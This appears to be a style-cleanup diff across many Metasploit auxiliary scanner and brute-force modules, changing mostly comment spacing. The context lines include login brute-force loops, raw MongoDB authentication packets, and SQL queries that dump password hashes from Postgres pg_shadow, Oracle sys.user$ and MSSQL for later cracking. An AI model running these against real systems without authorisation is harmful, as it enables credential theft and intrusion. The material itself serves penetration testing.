if reason == nil
headers['Cookie'] = 'PBack=0;' << res.get_cookies
else
#Login didn't work. no point on going on.
# Login didn't work. no point on going on.
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}' (HTTP redirect with reason #{reason})")
return :Skip_pass
end

View File

@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary
an arbitrary object instantiation flaw in the XML request processor.
},
'Author' => [
'hdm', #author
'jjarmoc' #improvements
'hdm', # author
'jjarmoc' # improvements
],
'License' => MSF_LICENSE,
'References' =>

View File

@ -146,7 +146,6 @@ class Metasploit3 < Msf::Auxiliary
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400

View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
case res.body
when nil
# Nothing
# Nothing
when /<Version xmlns=".*">(.*)<\/Version><\/getVersionResponse>/
version = "#{$1}"
success = true

View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'HTTP Page Scraper',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'Author' => ['et'],
'License' => MSF_LICENSE
)

View File

@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary
return false
else
print_status("Server #{wmap_target_host}:#{datastore['RPORT']} responded to SOAPAction: #{v}#{n} with HTTP: #{res.code} #{res.message}.")
## Add Report
# Add Report
report_note(
host: ip,
proto: 'tcp',

View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false
#request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
# request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
res_test = send_request_cgi({
'uri' => "http://#{datastore['CANARY_IP']}:80",
'method' => 'GET',

View File

@ -87,17 +87,17 @@ class Metasploit3 < Msf::Auxiliary
if datastore['VERBOSE'] == true
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
res.body.each_line do |line|
#the following is the last line of the useless response
# the following is the last line of the useless response
if line.to_s =~ /\/\/--><\/SCRIPT>/
#setting out = true to print all of the following stuff
# setting out = true to print all of the following stuff
out = true
next
end
if out == true
if line =~ /<META/ or line =~ /<Script/
#we are finished :)
#the next line is typical code from the website and nothing from us
#this means we can skip this stuff ...
# we are finished :)
# the next line is typical code from the website and nothing from us
# this means we can skip this stuff ...
out = false
next
else

View File

@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
'dun', # Discovery, PoC
'sinn3r' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Jul 13 2012"

View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', #Metasploit
'sinn3r', # Metasploit module
],
'References' =>
[

View File

@ -162,8 +162,8 @@ class Metasploit3 < Msf::Auxiliary
#
# From the documentation:
#
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
# seconds in order to prevent brute force and dictionary attacks."
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
# seconds in order to prevent brute force and dictionary attacks."
#
# Zabbix enables a Guest mode by default that allows access to the dashboard without auth

View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body)
#string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
# string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
if match = res.body.match(/\<!-- Domino Release(.*) --\>/);
server1 = $1
report_note(
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body)
#string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
# string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
if match = res.body.match(/\<title\>(.*)Lotus Notes\/Domino (.*) Release Notes\<\/title\>/);
server2 = $2
print_status("#{ip}:#{rport} Lotus Domino Release Notes Version: " + $2)
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body and res.body.index('TotalFileSize') and res.body.index('FileCount'))
#string we are regexing: # Regex Version=8.5.1.0
# string we are regexing: # Regex Version=8.5.1.0
if match = res.body.match(/Version=(.*)/);
server3 = $1
report_note(

View File

@ -98,10 +98,10 @@ class Metasploit3 < Msf::Auxiliary
data = http.get(20)
if data =~ /DVR WebViewer/i
#Confirmed ActiveX control over HTTP, display the control name and version
#Report HTTP service info since there is a confirmed IE ActiveX control
#Code base example:
#codebase="CtrWeb.cab#version=1,1,5,4"
# Confirmed ActiveX control over HTTP, display the control name and version
# Report HTTP service info since there is a confirmed IE ActiveX control
# Code base example:
# codebase="CtrWeb.cab#version=1,1,5,4"
if data.match(/codebase="(\w{1,16})\.(\w{1,3}).version=(\d{1,3},\d{1,3},\d{1,3},\d{1,3})/)
v = "#{$1}.#{$2} v#{$3}"
else
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
:info => "IE ActiveX CCTV DVR Control (#{v})"
)
else
#An HTTP server is listening on HTTP_PORT, however, does not appear to be
#the ActiveX control
# An HTTP server is listening on HTTP_PORT, however, does not appear to be
# the ActiveX control
print_status("An unknown HTTP interface was found on #{datastore['HTTP_PORT']}/TCP")
end
@ -135,15 +135,15 @@ class Metasploit3 < Msf::Auxiliary
fill_length1 = 64 - user.length
#Check if user name length is too long for submission (exceeds packet length)
# Check if user name length is too long for submission (exceeds packet length)
if fill_length1 < 1
return
end
#Build the authentication packet starting here
# Build the authentication packet starting here
data = "\x00\x01\x00\x00\x80\x00\x00\x00" + user + ("\x00" * fill_length1)
#Check if password length is too long for submission (exceeds packet length)
# Check if password length is too long for submission (exceeds packet length)
fill_length2 = 64 - pass.length
if fill_length2 < 1
return
@ -164,14 +164,14 @@ class Metasploit3 < Msf::Auxiliary
return :abort
end
#Analyze the response
# Analyze the response
if res == "\x00\x01\x03\x01\x00\x00\x00\x00" #Failed Password
vprint_error("#{rhost}:#{rport} Failed login as: '#{user}'")
return
elsif res =="\x00\x01\x02\x01\x00\x00\x00\x00" #Invalid User
vprint_error("#{rhost}:#{rport} Invalid user: '#{user}'")
#Stop attempting passwords for this user since it doesn't exist
# Stop attempting passwords for this user since it doesn't exist
return :skip_user
elsif res =="\x00\x01\x05\x01\x00\x00\x00\x00" or res =="\x00\x01\x01\x01\x00\x00\x00\x00"

View File

@ -210,9 +210,9 @@ class Metasploit3 < Msf::Auxiliary
print("Version of the InterBase server: #{info_svc_server_version}\n")
print("Implementation of the InterBase server: #{info_svc_implementation}\n\n")
# print(Rex::Text.to_hex_dump(response))
#print(Rex::Text.to_hex_dump(response))
#Add Report
# Add Report
report_note(
:host => ip,
:sname => 'ib',
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary
:data => "Version of the InterBase server: #{info_svc_server_version}"
)
#Add Report
# Add Report
report_note(
:host => ip,
:sname => 'ib',

View File

@ -49,8 +49,8 @@ class Metasploit3 < Msf::Auxiliary
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
#check if it is a OKI
#OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
# check if it is a OKI
# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
if first_six == "002536" || first_six == "008087" || first_six == "002536"
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
print_status("Found: #{sys_name}")

View File

@ -65,15 +65,15 @@ class Metasploit3 < Msf::Auxiliary
def require_auth?
request_id = Rex::Text.rand_text(4)
packet = "\x3f\x00\x00\x00" #messageLength (63)
packet << request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\x01\x00\x00\x00" #numberToReturn (1)
#query ({"listDatabases"=>1})
packet = "\x3f\x00\x00\x00" # messageLength (63)
packet << request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (admin.$cmd)
packet << "\x00\x00\x00\x00" # numberToSkip (0)
packet << "\x01\x00\x00\x00" # numberToReturn (1)
# query ({"listDatabases"=>1})
packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
sock.put(packet)
@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary
def auth(user, password, nonce)
request_id = Rex::Text.rand_text(4)
packet = request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\xff\xff\xff\xff" #numberToReturn (1)
packet = request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << datastore['DB'] + ".$cmd" + "\x00" # fullCollectionName (DB.$cmd)
packet << "\x00\x00\x00\x00" # numberToSkip (0)
packet << "\xff\xff\xff\xff" # numberToReturn (1)
#{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"}
document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65"
@ -109,12 +109,12 @@ class Metasploit3 < Msf::Auxiliary
document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00"
document << Rex::Text.md5(nonce + user + Rex::Text.md5(user + ":mongo:" + password)) + "\x00"
document << "\x00"
#Calculate document length
# Calculate document length
document.insert(0, [document.length + 4].pack("L"))
packet += document
#Calculate messageLength
# Calculate messageLength
packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength
sock.put(packet)
response = sock.recv(1024)
@ -137,15 +137,15 @@ class Metasploit3 < Msf::Auxiliary
def get_nonce
request_id = Rex::Text.rand_text(4)
packet = "\x3d\x00\x00\x00" #messageLength (61)
packet << request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (test.$cmd)
packet = "\x3d\x00\x00\x00" # messageLength (61)
packet << request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (test.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\x01\x00\x00\x00" #numberToReturn (1)
#query {"getnonce"=>1.0}
# query {"getnonce"=>1.0}
packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00"
sock.put(packet)
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
end
def have_auth_error?(response)
#Response header 36 bytes long
# Response header 36 bytes long
documents = response[36..1024]
#{"errmsg"=>"auth fails", "ok"=>0.0}
#{"errmsg"=>"need to login", "ok"=>0.0}

View File

@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
create_credential_login(login_data)
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
print_status("Instance Name: #{instancename.inspect}")
version = mssql_query(mssql_sql_info())[:rows][0][0]
@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary
end
#Stores the grabbed hashes as loot for later cracking
#The hash format is slightly different between 2k and 2k5/2k8
# Stores the grabbed hashes as loot for later cracking
# The hash format is slightly different between 2k and 2k5/2k8
def report_hashes(mssql_hashes, version_year)
case version_year
@ -154,8 +154,8 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Grabs the user tables depending on what Version of MSSQL
#The queries are different between 2k and 2k/2k8
# Grabs the user tables depending on what Version of MSSQL
# The queries are different between 2k and 2k/2k8
def mssql_hashdump(version_year)
is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]

View File

@ -40,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
instancename = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
print_status("Instance Name: #{instancename.inspect}")
version = mssql_query(mssql_sql_info())[:rows][0][0]
output = "Microsoft SQL Server Schema \n Host: #{datastore['RHOST']} \n Port: #{datastore['RPORT']} \n Instance: #{instancename} \n Version: #{version} \n====================\n\n"
#Grab all the DB schema and save it as notes
# Grab all the DB schema and save it as notes
mssql_schema = get_mssql_schema
return nil if mssql_schema.nil? or mssql_schema.empty?
mssql_schema.each do |db|
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Auxiliary
end
#Gets all of the Databases on this Instance
# Gets all of the Databases on this Instance
def get_db_names
results = mssql_query(mssql_db_names())[:rows]
return results
end
#Gets all the table names for the given DB
# Gets all the table names for the given DB
def get_tbl_names(db_name)
results = mssql_query("SELECT name,id FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
return results

View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [
'theLightCosine', # Original hashdump module
'jcran' # Authentication bypass bruteforce implementation
'jcran' # Authentication bypass bruteforce implementation
],
'References' => [
['CVE', '2012-2122'],

View File

@ -18,11 +18,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL Login Utility',
'Name' => 'MySQL Login Utility',
'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
]

View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
return mysql_schema
end
#Gets all of the Tables names inside the given Database
# Gets all of the Tables names inside the given Database
def get_tbl_names(dbname)
tables=[]

View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
This module scans NFS mounts and their permissions.
},
'Author' => ['<tebo[at]attackresearch.com>'],
'References' =>
'References' =>
[
['CVE', '1999-0170'],
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
resp = sunrpc_call(procedure, "")
# XXX: Assume that transport is udp and port is 2049
# Technically we are talking to mountd not nfsd
# Technically we are talking to mountd not nfsd
report_service(
:host => ip,

View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
# Called for each response packet
# Called for each response packet
def scanner_process(data, shost, sport)
@results[shost] ||= { messages: [], peers: [] }
@results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)
@ -148,14 +148,14 @@ class Metasploit3 < Msf::Auxiliary
idx = 0
peer_tuples = []
1.upto(pcnt) do
#u_int32 firsttime; /* first time we received a packet */
#u_int32 lasttime; /* last packet from this host */
#u_int32 restr; /* restrict bits (was named lastdrop) */
#u_int32 count; /* count of packets received */
#u_int32 addr; /* host address V4 style */
#u_int32 daddr; /* destination host address */
#u_int32 flags; /* flags about destination */
#u_short port; /* port number of last reception */
# u_int32 firsttime; /* first time we received a packet */
# u_int32 lasttime; /* last packet from this host */
# u_int32 restr; /* restrict bits (was named lastdrop) */
# u_int32 count; /* count of packets received */
# u_int32 addr; /* host address V4 style */
# u_int32 daddr; /* destination host address */
# u_int32 flags; /* flags about destination */
# u_short port; /* port number of last reception */
_,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack("NNNNNNNn")

View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
return if not check_dependencies
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
#Also, 11g uses SHA-1 while 8g-10g use DES
# Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
# Also, 11g uses SHA-1 while 8g-10g use DES
is_11g=false
query = 'select * from v$version'
ver = prepare_exec(query)
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
'Columns' => ['Username', 'Hash']
)
#Get the usernames and hashes for 8g-10g
# Get the usernames and hashes for 8g-10g
begin
if is_11g==false
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
#Get the usernames and hashes for 11g
# Get the usernames and hashes for 11g
else
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
@ -97,8 +97,8 @@ class Metasploit3 < Msf::Auxiliary
def report_hashes(table, is_11g, ip, service)
#reports the hashes slightly differently depending on the version
#This is so that we know which are which when we go to crack them
# Reports the hashes slightly differently depending on the version
# This is so that we know which are which when we go to crack them
if is_11g==false
jtr_format = "des"
else

View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
# Based vaugely on each_user_pass in AuthBrute
# Based vaguely on each_user_pass in AuthBrute
def each_sid(&block)
@@oracle_sid_fail = []
@@oracle_sid_success = []

View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
packet = sock.read(100)
find_packet = packet.include? "(ERROR_STACK=(ERROR="
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
#TODO: Module should report_vuln if this finding is solid.
# TODO: Module should report_vuln if this finding is solid.
rescue ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{ip}:#{rport} unable to connect to the server")
end

View File

@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#database links
# database links
res = send_request_raw({
'uri' => '/oradb/PUBLIC/ALL_DB_LINKS',
'version' => '1.1',

View File

@ -74,19 +74,19 @@ class Metasploit3 < Msf::Auxiliary
end
def do_login(user, pass, nsock=self.sock)
#Check if we are already at a logon prompt
# Check if we are already at a logon prompt
res = nsock.get_once(-1,5)
euser = encryption_header(encrypt(user))
nsock.put(euser)
res = nsock.get_once(-1,5)
#See if this knocked a login prompt loose
# See if this knocked a login prompt loose
if pca_at_login?(res)
nsock.put(euser)
res = nsock.get_once(-1,5)
end
#Check if we are now at the password prompt
# Check if we are now at the password prompt
unless res and res.include? "Enter password"
print_error "Problem Sending Login: #{res.inspect}"
return :abort

View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = connect
res = connect
banner = sock.get_once(-1, 30)
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} POP3 #{banner_sanitized}")

View File

@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(" TCP OPEN|FILTERED #{dhost}:#{dport}")
#Add Report
# Add Report
report_note(
:host => dhost,
:proto => 'tcp',

View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
#Query the Postgres Shadow table for username and password hashes and report them
# Query the Postgres Shadow table for username and password hashes and report them
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
service_data = {
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
credential_data.merge!(service_data)
#Error handling routine here, borrowed heavily from todb
# Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
print_error("A Connection Error occured")

View File

@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
def smart_query(query_string)
res = postgres_query(query_string,false)
#Error handling routine here, borrowed heavily from todb
# Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
print_error("A Connection Error occured")

View File

@ -71,7 +71,6 @@ class Metasploit3 < Msf::Auxiliary
end
# Reporting
report_service(
:host => rhost,
:port => rport,
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
end
# Logout
postgres_logout
rescue Rex::ConnectionError

View File

@ -108,8 +108,8 @@ class Metasploit3 < Msf::Auxiliary
# For debugging only.
#rescue ::Exception
# print_error("#{$!}")
# return :abort
# print_error("#{$!}")
#return :abort
ensure
disconnect()

View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
#read input register=func:04, register 1
# read input register=func:04, register 1
sploit="\x21\x00\x00\x00\x00\x06\x01\x04\x00\x01\x00\x00"
sploit[6] = [datastore['UNIT_ID']].pack("C")
connect()

Some files were not shown because too many files have changed in this diff Show More